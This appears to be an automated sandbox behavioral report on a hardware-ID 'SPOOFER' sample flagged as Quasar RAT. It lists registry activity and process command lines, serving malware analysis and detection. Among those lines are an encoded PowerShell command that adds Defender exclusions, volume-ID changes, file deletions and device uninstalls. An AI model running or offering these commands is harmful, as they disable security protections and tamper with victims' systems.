C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 6MK3-J04N
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 6MK3-J04N
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: UCG5-40TO
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: UCG5-40TO
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O35N-28F7
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O35N-28F7
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 849M-JU9H
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 849M-JU9H
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-28 18:55
Reported
2023-12-28 18:58
Platform
win10v2004-20231215-en
Max time kernel
46s
Max time network
189s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\cmd.exe | N/A |
Executes dropped EXE
Enumerates connected drives
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\ProgramData\Microsoft\Windows\Volumeid64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\system32\wusa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\System32\Conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\NextInstance = "0" | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\system32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\system32\conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\system32\conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\ProgramData\Microsoft\Windows\Volumeid64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\System32\cmd.exe | N/A |
| Delete value | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\system32\conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\ProgramData\Microsoft\Windows\Volumeid64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\system32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\system32\wusa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\system32\wusa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\system32\wusa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\ProgramData\Microsoft\Windows\Volumeid64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\system32\conhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count = "0" | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\system32\powercfg.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\powercfg.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 | C:\Windows\system32\cmd.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\System32\cmd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ContainerID | C:\Windows\system32\conhost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} | C:\ProgramData\Microsoft\Windows\Volumeid64.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ClassGuid | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceType | C:\Windows\System32\cmd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc | C:\Windows\System32\cmd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Control | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} | C:\Windows\system32\conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ContainerID | C:\Windows\system32\wusa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGuid | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGUID | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000064\00000000 | C:\Windows\system32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0003 | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\LocationInformation | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Control | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29} | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\System32\Conhost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\System32\Conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 | C:\Windows\system32\conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000 | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters | C:\Windows\System32\Conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ClassGUID | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066 | C:\Windows\System32\Conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000 | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags | C:\Windows\system32\conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 | C:\Windows\system32\conhost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM | C:\ProgramData\Microsoft\Windows\Volumeid64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 | C:\Windows\system32\wusa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service | C:\Windows\system32\cmd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29} | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Control | C:\ProgramData\Microsoft\Windows\Volumeid64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064 | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
| Delete value | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80497100-8c73-48b9-aad9-ce387e19c56e}\0006 | C:\Windows\System32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Image | Command line |
| C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe | "C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe" |
| C:\Users\Admin\AppData\Local\Temp\svchost.exe | "C:\Users\Admin\AppData\Local\Temp\svchost.exe" |
| C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe | "C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA=" |
| C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe | "C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe" |
| C:\Users\Admin\AppData\Roaming\conhost_sft.exe | "C:\Users\Admin\AppData\Roaming\conhost_sft.exe" |
| C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe | "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe" |
| C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: ZFB2-0U5Z |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: ZFB2-0U5Z |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat |
| C:\ProgramData\Microsoft\Windows\DevManView.exe | C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard"" |
| C:\ProgramData\Microsoft\Windows\DevManView.exe | C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk" |
| C:\ProgramData\Microsoft\Windows\DevManView.exe | C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\" |
| C:\ProgramData\Microsoft\Windows\DevManView.exe | C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk" |
| C:\ProgramData\Microsoft\Windows\DevManView.exe | C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\" |
| C:\ProgramData\Microsoft\Windows\DevManView.exe | C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\" |
| C:\ProgramData\Microsoft\Windows\DevManView.exe | C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\" |
| C:\ProgramData\Microsoft\Windows\DevManView.exe | C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\" |
| C:\ProgramData\Microsoft\Windows\DevManView.exe | C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard"" |
| C:\ProgramData\Microsoft\Windows\DevManView.exe | C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard"" |
